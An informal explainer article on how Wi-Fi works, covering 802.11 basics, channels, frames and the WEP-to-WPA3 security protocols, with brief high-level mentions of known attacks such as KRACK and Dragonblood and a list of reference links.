In today’s age we use Wi-Fi and internet for a lot of things. Like a lot. Ever wondered how Wi-Fi works? Or if internet and Wi-Fi are the same thing? Let’s discuss it!

What is Wi-Fi?

The internet is basically a “network of networks” that uses TCP/IP protocols to connect to devices and networks globally. In layman terms, it connects everyone with everything by using an globally agreed upon method of communication (TCP/IP) to create a big global network that interconnects networks with each other. There are multiple ways to access the internet- using physical hardware like fiber optics, cables etc or using wireless technology like Wi-Fi, Satellite etc.

One of the ways to connect to the device that allows us to access the internet is Wi-Fi. Wi-Fi is a network protocol that allows us to connect to the router/access point to alow access to the internet or set up LANs to allow near-by devices to share data. Like we can print stuff wirelessly without having to set up a physical connection because of Wi-Fi.

It is based on IEEE 802.11 network standard which basically defines the rules of communication. Till this date the Wi-Fi uses a large number of held by many different organizations. Australia, the United States and the Netherlands simultaneously claim the invention of Wi-Fi, and a consensus has not been reached globally. As of 1999, it’s a trademark of the non-profit ​Wi-Fi Alliance, an international association of companies involved with wireless LAN technologies and products.​ Manufacturers may use the trademark to brand products certified for Wi-Fi interoperability.

How does Wi-Fi work?

Each device has an network adaptor that is added by the manufacturers. It’s a physical component which let’s the device interact to interface with a local area network (LAN) or another type of network in order to access the internet.

TLDR: All the communications happen over radio waves over an agreed upon frequency. The data is sent in form of data packets over radio.

Detailed:

  1. How does the data travel over radio?
  • As with all radio, it is done using modulation and demodulation of carrier waves. It is done via a modem (computer hardware; the name comes from modulator–demodulator) which converts data from digital format into analog transmission format. The sender modem transmits the data via modulation of carrier waves (basically changes the property like frequency, phases, amplitudes of the periodic waveform) and the receiver modem reverts it back to its original digital form.
  • Different versions of Wi-Fi use different techniques, 802.11b uses direct-sequence spread spectrum on a single carrier, whereas 802.11a, Wi-Fi 4, 5 and 6 use orthogonal frequency-divison multiplexing.
  • Stations come programmed with a globally unique 48-bit MAC address. The MAC addresses are used to specify both the destination and the source of each data packet. MAC address can be considered as your house address and stations can be considered as post offices so the network interface (post master) doesn’t accept packets meant for other stations.
  • Channels are used to send the data paclets. They are half duplex and can be time-shared by multiple networks. When communication happens on the same channel, any information sent by one computer is locally received by all, even if that information is intended for just one destination. The network interface card interrupts the CPU only when applicable packets are received: the card ignores information not addressed to it. The use of the same channel also means that the data bandwidth is shared, such that, for example, available data bandwidth to each device is halved when two stations are actively transmitting.
  1. How are the channels created and defined?
  • The 802.11 standard provides several distinct radio frequency ranges for use in Wi-Fi communications: 900 MHz, 2.4 GHz, 3.6 GHz, 4.9 GHz, 5 GHz, 5.9 GHz and 60 GHz bands. Each range is divided into a multitude of channels. In the standards, channels are numbered at 5 MHz spacing within a band (except in the 60 GHz band, where they are 2.16 GHz apart), and the number refers to the centre frequency of the channel.
2.4GHz Channels
  • A scheme known as carrier-sense multiple access with collision avoidance (CSMA/CA) governs the way stations share channels.
  • Countries apply their own regulations to the allowable channels, allowed users and maximum power levels within these frequency ranges. Spectrum assignments and operational limitations are not consistent worldwide: Australia and Europe allow for an additional two channels (12, 13) beyond the 11 permitted in the United States for the 2.4 GHz band, while Japan has three more (12–14).
Non-Overlapping 2.4GHz Channels
  1. What is the data packet structure?
  • The data is organized into 802.11 frames that are very similar to Ethernet frame sat the data link layer, but with extra address fields. MAC addresses are used as network addresses for routing over the LAN.
  • Wi-Fi’s MAC and physical layer (PHY) specifications are defined by IEEE 802.11 for modulating and receiving one or more carrier waves to transmit the data in the infrared, and 2.4, 60 GHz frequency bands. They are created and maintained by the IEEE LAN/MAN Standards Committee (IEEE 802).
  • For internetworking purposes, Wi-Fi is usually layered as a link layer (equivalent to the physical and data link layers of the OSI model) below the internet layer of the Internet Protocol. This means that nodes have an associated internet address and, with suitable connectivity, this allows full Internet access.
Generic 802.11 Frame Format

Wi-Fi Security Protocols

WEP, WPA, WPA2, and the latest WPA3 are the four types of wireless network security protocols, each with increasing levels of security.

  1. WEP- Wired Equivalent Privacy
  • Introduced as part of the original IEEE 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network.
  • WEP was the only encryption protocol available to 802.11a and 802.11b devices built before the WPA standard, which was available for 802.11g devices.
  • WEP uses the stream cipher RC4 for confidentiality, and the CRC-32 checksum for integrity. WEP used the RC4 algorithm for encrypting data, creating a unique key for each packet by combining a new Initialization Vector (IV) with a shared key (it has 40 bits of vectored key and 24 bits of random numbers). Decryption involved reversing this process, using the IV and the shared key to generate a key stream and decrypt the payload.
  • Two methods of authentication can be used with WEP: Open System authentication and Shared Key authentication. Ironically, Open System is more secure compared to Shared Key authentication.
  • Caffe Latte attack was one of the attacks WEP was vulnerable to.
  1. WPA
  • The Wi-Fi Alliance intended WPA as an intermediate measure to take the place of WEP pending the availability of the full IEEE 802.11i- 2004 standard. WPA could be implemented through firmware upgrades on wireless NIC that began shipping as far back as 1999. However, since the changes required in the wireless access points (APs) were more extensive than those needed on the network cards, most pre-2003 APs could not be upgraded to support WPA.
  • The WPA protocol implements the Temporal Key Integrity Protocol (TKIP). WEP used a 64-bit or 128-bit encryption key that must be manually entered on wireless access points and devices and does not change. TKIP employs a per-packet key, meaning that it dynamically generates a new 128-bit key for each packet and thus prevents the types of attacks that compromised WEP.
  • WPA also includes a Message Integrity Check, which is designed to prevent an attacker from altering and resending data packets. This replaces the cyclic redundancy check (CRC) that was used by the WEP standard.
  • Researchers have since discovered a flaw in WPA that relied on older weaknesses in WEP and the limitations of the message integrity code hash function, named Michael, to retrieve the keystream from short packets to use for re-injection and spoofing.
  1. WPA-2
  • WPA2 replaced WPA in 2004. With it being mandatory for Wi-Fi trademark certification till 2020.
  • In WPA2-protected WLANs, secure communication is established through a multi-step process. Initially, devices associate with the Access Point (AP) via an association request. This is followed by a 4-way handshake, a crucial step ensuring both the client and AP have the correct Pre-Shared Key (PSK) without actually transmitting it. During this handshake, a Pairwise Transient Key (PTK) is generated for secure data exchange.
  • WPA2 employs the Advanced Encryption Standard AES with a 128-bit key, enhancing security through the Counter-Mode/CBC-Mac Protocol (CCMP). This protocol ensures robust encryption and data integrity, using different Initialization Vectors (IVs) for encryption and authentication purposes.
  • Hole196 is a vulnerability in the WPA2 protocol that abuses the shared Group Temporal Key (GTK). It can be used to conduct man-in-the-middle and denial-of-service attacks.
  • In October 2017, details of the KRACK (Key Reinstallation Attack) attack on WPA2 were published. KRACK exploits a weakness in the WPA2 4-Way Handshake, a critical process for generating encryption keys. Attackers can force multiple handshakes, manipulating key resets. By intercepting the handshake, they could decrypt network traffic without cracking encryption directly.
  1. WPA-3
  • In January 2018, the Wi-Fi Alliance announced WPA3 as a replacement to WPA2. WPA3 support has been mandatory for devices which bear the “Wi-Fi CERTIFIED™” logo since July 2020.
  • The new standard uses an equivalent 192-bit cryptographic strength in WPA3-Enterprise mode AES-256 in GCM mode(Galois/Counter Mode) with SHA-384 as The new standard uses an equivalent 192-bit cryptographic strength in WPA3-Enterprise mode. AES-256 in GCM mode (Galois/Counter Mode) with SHA-384 as HMAC, and still mandates the use of CMP-128. AES-128 in CCM mode as the minimum encryption algorithm in WPA3-Personal mode.
  • The WPA3 standard also replaces the pre-shared key (PSK) exchange with Simultaneous Authentication of Equals (SAE) exchange, a method originally introduced with IEEE 802.11s, resulting in a more secure initial key exchange in personal mode and forward secrecy. WPA3 also supports Opportunistic Wireless Encryption (OWE) for open Wi-Fi networks that do not have passwords.
  • Currently vulnerabilities are present that allow Dragonblood Attacks and Frag attacks in WPA3. In response, security updates and protocol changes are being integrated into WPA3 and EAP-pwd to address these vulnerabilities and enhance overall Wi-Fi security.

References

  1. https://computer.howstuffworks.com/wireless-network.htm
  2. https://www.wi-fi.org/discover-wi-fi
  3. https://www.explainthatstuff.com/articles_computers.html
  4. https://en.wikipedia.org/wiki/Wi-Fi#
  5. https://web.archive.org/web/20070418182559/http://standards.ieee.org/getieee802/802.11.html
  6. https://www.ieee802.org/
  7. https://www.eeherald.com/section/design-guide/ieee802_3.html
  8. https://www.wiisfi.com/#setup
  9. https://www.tek.com/en/documents/primer/wi-fi-overview-80211-physical-layer-and-transmitter-measurements
  10. https://www.wififorbeginners.com/wp-content/uploads/2015/06/WiFi-For-Beginners-Module-1-What-is-WiFi-.pdf
  11. https://www.netprojnetworks.com/802-11-frame/
  12. https://howiwifi.com/2020/07/03/spectrum-analysis-phys-and-interferers/
  13. https://en.wikipedia.org/wiki/IEEE_802.11#
  14. https://en.wikipedia.org/wiki/Wi-Fi_Protected_Access#Versions
  15. https://en.wikipedia.org/wiki/Wired_Equivalent_Privacy